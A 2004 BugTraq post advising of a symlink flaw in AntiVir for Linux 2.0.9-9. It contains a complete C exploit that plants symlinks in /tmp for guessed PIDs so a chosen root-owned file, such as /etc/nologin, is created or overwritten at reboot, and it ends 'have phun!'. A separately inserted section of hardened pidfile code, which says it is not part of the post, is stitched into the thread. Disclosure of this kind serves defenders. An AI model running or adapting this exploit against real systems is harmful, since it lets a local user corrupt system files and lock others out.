BugTraq
symlink vul for Antivir / Linux Version 2.0.9-9 (maybe lower) Jan 13 2004 06:37PM
Rene (l0om excluded org) (1 replies)


discovered and written: l0om <l0om (at) excluded (dot) org [email concealed]>

date: 13.01.2004

risk: medium

page: www.excluded.org

symlink vul for Antivir / Linux Version 2.0.9-9 (maybe lower)

antivir gets started on bootup and creates a tmp file (/tmp/.pid_antivir_$$ - where $$ is the process id). the file gets read/write permissions for the superuser and nothing more. the file gets created and won't be deleted till the system reboots.

well, as most of us know, the PID of a process is not the same on every reboot. so the PID of the antivir process goes +/- 10-20. if we create a link with the correct name (example .pid_antivir_1204) which points somewhere into the system, it will create or overwrite the destination of our symbolic link.

this exploit should work for most rebooting systems, as we guess the pid of the new process will be greater than 1000 and less than 2000. for better usage take a look at the running process ID and set the defined START -20 and END +20. sometimes one reboot does the job and sometimes it takes two reboots.

i think the programmers could use the same method as the guys from xmms. before they create anything they first "unlink" the filename in the /tmp dir.

greets @ proxy, sirius, takt, maximilian, !ntruder, fe2k, dna, feem, cyniker, xnet and the rest of excluded!

example:

./antisys /etc/nologin
(reboot)
ls -l /etc/nologin
rw------- root root /etc/nologin

have phun!


#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>
#include <unistd.h>

#define PATH "/tmp/.pid_antivir_"   /* prefix of the PID file antivir creates at boot */
#define START 1000                  /* guessed PID range of the antivir process */
#define END 2000

int main(int argc, char **argv)
{
    int i;
    char buf[150];

    printf("Antivir 2.0.9-9 exploit - written by l0om\n");
    printf(" WWW.EXCLUDED.ORG\n\n");

    if(argc != 2) {
        printf("usage: %s <destination-file>\n", argv[0]);
        exit(0xff);
    }

    printf("### hit enter to create or overwrite file %s: ", argv[1]);
    fflush(stdout);
    read(STDIN_FILENO, buf, 1);   /* wait for a keypress on stdin */
    printf("working\n\n");

    /* plant one symlink per candidate PID, all pointing at the target file */
    for(i = START; i < END; i++) {
        snprintf(buf, sizeof(buf), "%s%d", PATH, i);
        if(symlink(argv[1], buf) == -1) {
            fprintf(stderr, "cannot create symlink from %s to %s [Nr.%d]\n", buf, argv[1], i);
            fprintf(stderr, "skipping...\n");
        }
    }

    printf("\ndone!\n");
    printf("on the next reboot we hopefully create or overwrite %s\n", argv[1]);
    return(0x00);
}

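The file-creation pattern the advisory describes and its fix, as an added example that is neither part of the post nor AntiVir's code: the vulnerable fopen-style PID-file writer next to a hardened one that refuses a planted symlink (O_EXCL, O_NOFOLLOW, fstat check), with a constructed demo in a scratch directory under /tmp. Function names, the scratch paths and the PID value are my own; the hardened variant goes beyond the post's unlink-first suggestion, which still leaves a race between unlink() and open().

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Vulnerable pattern from the advisory: fopen("w") follows whatever sits at
 * path, so a planted symlink makes a root daemon create/truncate its target. */
int write_pidfile_unsafe(const char *path, pid_t pid) {
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fprintf(f, "%d\n", (int)pid);
    return fclose(f);
}

/* Hardened writer: O_EXCL fails if any name already exists (planted symlink
 * included), O_NOFOLLOW refuses symlinks, and fstat confirms the descriptor
 * is a regular file we own before anything is written. Returns 0 or -1. */
int write_pidfile_safe(const char *path, pid_t pid) {
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW | O_CLOEXEC, 0600);
    if (fd < 0) return -1;                       /* EEXIST or ELOOP for a symlink */
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()) {
        close(fd); errno = EPERM; return -1;
    }
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%d\n", (int)pid);
    ssize_t w = write(fd, buf, (size_t)n);
    return (close(fd) == 0 && w == n) ? 0 : -1;
}

/* Constructed demo (hypothetical paths): plant a symlink named like the PID
 * file pointing at "target"; returns 1 if only the unsafe writer clobbers it. */
int demo_symlink_attack(void) {
    char dir[] = "/tmp/pidfile-demo-XXXXXX", target[64], link[64];
    if (!mkdtemp(dir)) return 0;
    snprintf(target, sizeof target, "%s/target", dir);
    snprintf(link, sizeof link, "%s/.pid_antivir_1204", dir);
    int ok = symlink(target, link) == 0
          && write_pidfile_unsafe(link, 1204) == 0   /* followed: target created */
          && access(target, F_OK) == 0
          && unlink(target) == 0                     /* reset for the safe writer */
          && write_pidfile_safe(link, 1204) == -1    /* refused */
          && access(target, F_OK) != 0;              /* target never created */
    unlink(link); unlink(target); rmdir(dir);
    return ok;
}
```

The demo runs entirely inside a directory it creates and removes itself; the same open() flags apply to any privileged program that writes into a world-writable directory.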
Re: symlink vul for Antivir / Linux Version 2.0.9-9 (maybe lower) Jan 27 2004 02:55PM
AntiVir Support (support antivir de)
Copyright 2010, SecurityFocus